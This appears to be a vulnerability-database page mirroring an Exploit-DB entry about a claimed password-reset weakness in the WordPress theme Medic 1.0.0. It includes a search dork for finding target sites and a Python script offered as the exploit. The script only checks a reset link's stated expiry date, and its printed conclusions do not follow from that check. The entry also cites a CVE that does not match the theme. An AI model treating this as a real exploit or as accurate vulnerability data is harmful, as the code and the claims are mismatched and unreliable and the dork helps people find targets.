WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

vendor:

WordPress Theme Medic

by:

Amirhossein Bahramizadeh

8.1

CVSS

HIGH

Weak Password Recovery Mechanism

640

CWE

Product Name: WordPress Theme Medic

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: CVE-2020-11027

CPE: a:wordpress_theme:medic:1.0.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-11027/

Other Scripts:

Platforms Tested: Windows, Linux

2023

WordPress Theme Medic v1.0.0 – Weak Password Recovery Mechanism for Forgotten Password

The WordPress Theme Medic v1.0.0 has a weak password recovery mechanism for forgotten passwords. This vulnerability allows an attacker to reset a user's password without proper authorization. The vulnerability can be exploited by sending a specially crafted password reset link to the targeted user's email address.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the WordPress Theme Medic. Additionally, users should ensure strong passwords are used and enable two-factor authentication to add an extra layer of security.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027

import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta

# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = 'user@example.com'

# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
    email = f.read()
    soup = BeautifulSoup(email, 'html.parser')
    reset_link = soup.find('a', href=True)['href']
    print(f'Reset Link: {reset_link}')

# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
    # Get the expiration date from the reset link HTML
    soup = BeautifulSoup(response.text, 'html.parser')
    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
    print(f'Expiration Date: {expiration_date}')

    # Check if the expiration date is less than 24 hours from now
    if expiration_date < datetime.now() + timedelta(hours=24):
        print('Password reset link expires upon changing the user password.')
    else:
        print('Password reset link does not expire upon changing the user password.')
else:
    print(f'Error fetching reset link: {response.status_code} {response.text}')
    exit()